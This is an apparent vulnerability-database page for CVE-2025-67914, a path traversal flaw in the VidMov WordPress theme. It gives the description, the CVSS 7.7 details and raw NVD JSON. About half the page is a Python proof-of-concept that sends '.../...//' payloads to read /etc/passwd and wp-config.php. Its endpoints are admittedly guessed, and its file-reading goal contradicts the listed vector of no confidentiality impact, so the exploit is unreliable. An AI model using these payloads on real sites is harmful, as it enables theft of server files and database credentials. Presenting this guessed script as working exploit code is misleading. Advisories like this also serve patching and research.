Security Vulnerability Report
中文
CVE-2025-67914 CVSS 7.7 HIGH

CVE-2025-67914

Published: 2026-01-08 10:15:50
Last Modified: 2026-04-27 18:16:48

Description

Path Traversal: '.../...//' vulnerability in beeteam368 VidMov vidmov allows Path Traversal.This issue affects VidMov: from n/a through <= 2.3.8.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

VidMov <= 2.3.8
beeteam368 VidMov theme 所有版本至2.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67914 Path Traversal PoC # Target: VidMov Theme <= 2.3.8 # Type: Path Traversal via '.../...//' import requests import sys TARGET_URL = "http://target-site.com/wp-content/themes/vidmov/" def test_path_traversal(): """Test for Path Traversal vulnerability in VidMov""" # Path traversal payloads payloads = [ ".../...//.../...//etc/passwd", ".../...//.../...//wp-config.php", ".../...//.../...//.../...//etc/passwd" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Cookie": "wordpress_test_cookie=1" # Authenticated session required } for payload in payloads: print(f"[*] Testing payload: {payload}") # Common VidMov endpoints that may be vulnerable endpoints = [ f"{TARGET_URL}inc/backend/file-manager/ajax.php?path={payload}", f"{TARGET_URL}inc/ajax.php?action=load_file&file={payload}" ] for endpoint in endpoints: try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: if "root:" in response.text or "DB_NAME" in response.text: print(f"[!] VULNERABLE! Retrieved sensitive data from: {endpoint}") print(f"[+] Response preview:\n{response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error: {e}") print("[*] No vulnerable endpoint found or authentication required") return False if __name__ == "__main__": test_path_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67914", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:50.217", "lastModified": "2026-04-27T18:16:48.327", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal: '.../...//' vulnerability in beeteam368 VidMov vidmov allows Path Traversal.This issue affects VidMov: from n/a through <= 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/vidmov/vulnerability/wordpress-vidmov-theme-2-3-8-path-traversal-vulnerability?_s_id=cve", "source": "[email protected]"}]}}